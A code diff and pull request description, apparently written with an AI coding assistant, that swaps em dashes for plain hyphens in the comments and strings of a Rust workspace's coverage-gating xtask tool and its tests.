         let out = std::process::Command::new("cargo")
             .args(["metadata", "--no-deps", "--format-version", "1"])
             .output()
-            .expect("failed to spawn cargo metadata — is cargo installed in PATH?");
+            .expect("failed to spawn cargo metadata - is cargo installed in PATH?");
         if !out.status.success() {
             anyhow::bail!("cargo metadata exited non-zero");
         }
@@ -70,7 +70,7 @@ impl Runner for RealRunner {
 pub enum CoverageMode {
     /// No arguments: gate every workspace package (local-dev full check).
     All,
-    /// `--package <pkg>`: gate exactly one package (the CI per-package fan-out —
+    /// `--package <pkg>`: gate exactly one package (the CI per-package fan-out -
     /// each package runs on its own runner, in parallel).
     Package(String),
 }
@@ -149,7 +149,7 @@ fn gate_package(runner: &dyn Runner, pkg: &str) -> Result<()> {
     if !runner.cargo(&args)? {
         // Say *what* is uncovered, not just that something is. "Open the HTML
         // report" is useless on a CI runner, whose filesystem nobody will ever
-        // see — and a gap that only appears on one OS (a `#[cfg(target_os)]`
+        // see - and a gap that only appears on one OS (a `#[cfg(target_os)]`
         // block, or a test the other platform skips) can only be diagnosed
         // from that machine's own run.
         let uncovered = uncovered_regions(runner, pkg).unwrap_or_default();
@@ -204,7 +204,7 @@ fn uncovered_regions(runner: &dyn Runner, pkg: &str) -> Option<Vec<String>> {
 ///
 /// A `segments` entry is `[line, col, count, has_count, is_region_entry,
 /// is_gap]`. A region *entry* with a count of zero is the start of code that
-/// never ran — which is exactly what the gate is complaining about. Non-entry
+/// never ran - which is exactly what the gate is complaining about. Non-entry
 /// segments and gap regions are noise here.
 pub fn parse_uncovered(json: &serde_json::Value) -> Vec<String> {
     let mut out = Vec::new();
@@ -241,7 +241,7 @@ pub fn parse_uncovered(json: &serde_json::Value) -> Vec<String> {
 /// Parse workspace package names from `cargo metadata` JSON. Two members are
 /// excluded from the gate: `xtask` (the coverage tool itself) and
 /// `leviath-testkit` (dev-dependency-only test scaffolding whose every line
-/// executes inside other packages' gated suites — self-gating it at 100%
+/// executes inside other packages' gated suites - self-gating it at 100%
 /// would force tests-of-test-helpers with no defect-finding power).
 pub fn parse_workspace_packages(meta: &serde_json::Value) -> Vec<String> {
     let members: std::collections::HashSet<String> = meta["workspace_members"]
@@ -366,7 +366,7 @@ mod tests {
     /// A filename with no `/src/` segment is reported whole rather than
     /// silently dropped.
     /// llvm-cov reports Windows paths with backslashes, and a one-platform gap
-    /// is exactly the case this output exists for -- so the shortening has to
+    /// is exactly the case this output exists for - so the shortening has to
     /// handle both separators.
     #[test]
     fn parse_uncovered_shortens_a_windows_path() {

--- a/xtask/src/main.rs
+++ b/xtask/src/main.rs
@@ -1,4 +1,4 @@
-//! Leviath xtask — dev-tool automation for the workspace.
+//! Leviath xtask - dev-tool automation for the workspace.
 //!
 //! Run via: `cargo xtask <subcommand>`
 //!

--- a/xtask/tests/integration.rs
+++ b/xtask/tests/integration.rs
@@ -1,7 +1,7 @@
 //! Integration tests for the `xtask` binary.
 //!
 //! These tests spawn the compiled `xtask` binary and verify its exit codes and
-//! output — end-to-end coverage of the `main()` entry point and the
+//! output - end-to-end coverage of the `main()` entry point and the
 //! `dispatch()` router, which cannot be reached by unit tests alone.
 //!
 //! `env!("CARGO_BIN_EXE_xtask")` resolves to the path of the compiled binary at
@@ -11,7 +11,7 @@
 
 use std::process::Command;
 
-/// Path to the compiled `xtask` binary — set by Cargo at build time.
+/// Path to the compiled `xtask` binary - set by Cargo at build time.
 fn xtask_bin() -> &'static str {
     env!("CARGO_BIN_EXE_xtask")
 }


### PR DESCRIPTION
## What

The repo-wide prose pass, in two comment-only commits:

1. **Em dashes become plain hyphens** across comments, doc comments, markdown, TOML, blueprints, and user-facing strings (~2,100 em dashes plus ~230 ` -- ` stand-ins, one convention everywhere). Two carve-outs: the HTML entity decoder still produces a real em dash for `&mdash;`/`&#x2014;` (that character is decoded web content, not our prose - kept as `\u{2014}` escapes with tests pinning the distinction), and mid-sentence dashes that landed at doc-line starts are rejoined so rustdoc does not read them as list items.
2. **Change-narration comments state their invariant**: ~70 "It used to X, which caused Y" comments are rewritten in present tense with the failure mode, platform quirk, or security reasoning intact - the history goes back to git blame where it lives. ~60 issue references leave the `///`/`//!` doc comments they rendered into, their context folded into prose; plain implementation comments keep theirs. Phrase matches that were not narration (purpose statements, runtime state, back-compat semantics, histories that carry the argument) are deliberately unchanged.

## Testing

Comment/prose-only diff (verified no non-comment line changed in the editorial commit); fmt, clippy `--all-features -D warnings`, `RUSTDOCFLAGS="-D warnings" cargo doc`, and the full workspace suite green on both commits.

Stacked on #135 - base switches to main once that merges.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01FnnF9RWB5huyguHxrrCsx3